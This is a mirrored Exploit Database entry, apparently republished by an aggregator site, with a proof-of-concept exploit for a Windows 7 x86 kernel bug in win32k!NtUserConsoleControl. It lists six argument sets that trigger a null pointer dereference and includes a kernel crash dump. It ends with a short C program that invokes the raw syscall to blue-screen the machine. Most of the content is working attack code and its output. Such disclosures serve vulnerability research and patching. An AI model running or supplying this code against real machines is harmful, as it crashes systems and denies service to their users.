Microsoft Windows Kernel – ‘win32k!NtUserConsoleControl’ Denial of Service (PoC)

• Exploit Database
• 16 阅读

• 作者： vportal
  日期： 2018-07-30
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/45104/

• /*
  # Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)
  # Author: vportal
  # Date: 2018-07-27
  # Vendor homepage: http://www.microsoft.com
  # Version: Windows 7 x86
  # Tested on: Windows 7 x86
  # CVE: N/A
  
  # It is possible to trigger a BSOD caused by a Null pointer deference when calling the system 
  # call NtUserConsoleControl with the following arguments:
  
  # NtUserControlConsole(1,0,8).
  # NtUserControlConsole(4,0,8).
  # NtUserControlConsole(6,0,12).
  # NtUserControlConsole(2,0,12).
  # NtUserControlConsole(3,0,20).
  # NtUserControlConsole(5,0,8).
  
  # Different crashes are reproduced for each case. For the second case the crash is showed below:
  # EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace referencia a la memoria 
  # en 0x%08lx. La memoria no se pudo %s.
  # FAULTING_IP:
  # win32k!xxxSetConsoleCaretInfo+c
  # 93310641 8b0emov ecx,dword ptr [esi]
  
  # TRAP_FRAME:8c747b2c -- (.trap 0xffffffff8c747b2c)
  # ErrCode = 00000000
  # eax=00000000 ebx=00000000 ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003
  # eip=93310641 esp=8c747ba0 ebp=8c747bb0 iopl=0 nv up ei ng nz ac po nc
  # cs=0008ss=0010ds=0023es=0023fs=0030gs=0000 efl=00010292
  # win32k!xxxSetConsoleCaretInfo+0xc:
  # 93310641 8b0emov ecx,dword ptr [esi]ds:0023:00000000=????????
  # Resetting default scope
  
  # CUSTOMER_CRASH_COUNT:1
  # DEFAULT_BUCKET_ID:VISTA_DRIVER_FAULT
  # BUGCHECK_STR:0x8E
  # PROCESS_NAME:Win32k-fuzzer_
  
  # CURRENT_IRQL:0
  # LAST_CONTROL_TRANSFER:from 9330fc27 to 93310641
  
  # STACK_TEXT: 
  # 8c747bb0 9330fc27 00000000 00000003 00000014 win32k!xxxSetConsoleCaretInfo+0xc
  # 8c747bcc 9330fa8d 00000003 00000000 00000014 win32k!xxxConsoleControl+0x147
  # 8c747c20 82848b8e 00000003 00000000 00000014 win32k!NtUserConsoleControl+0xc5
  # 8c747c20 012e6766 00000003 00000000 00000014 nt!KiSystemServicePostCall
  # WARNING: Frame IP not in any known module. Following frames may be wrong.
  # 0016f204 00000000 00000000 00000000 00000000 0x12e6766
  
  # PoC code:
  */
  
  #include <Windows.h>
  
  extern "C"
  
  ULONG CDECL SystemCall32(DWORD ApiNumber, ...) 
  {
  __asm{mov eax, ApiNumber};
  __asm{lea edx, ApiNumber + 4};
  __asm{int 0x2e};
  }
  
  
  int _tmain(int argc, _TCHAR* argv[])
  {
  
  int st = 0;
  int syscall_ID = 0x1160; //NtUserControlConsole ID Windows 7
  
  LoadLibrary(L"user32.dll");
  
  st = (int)SystemCall32(syscall_ID, 4, 0, 8);
  
  return 0;
  }
  
  # The vulnerability has only been testedin Windows 7 x86.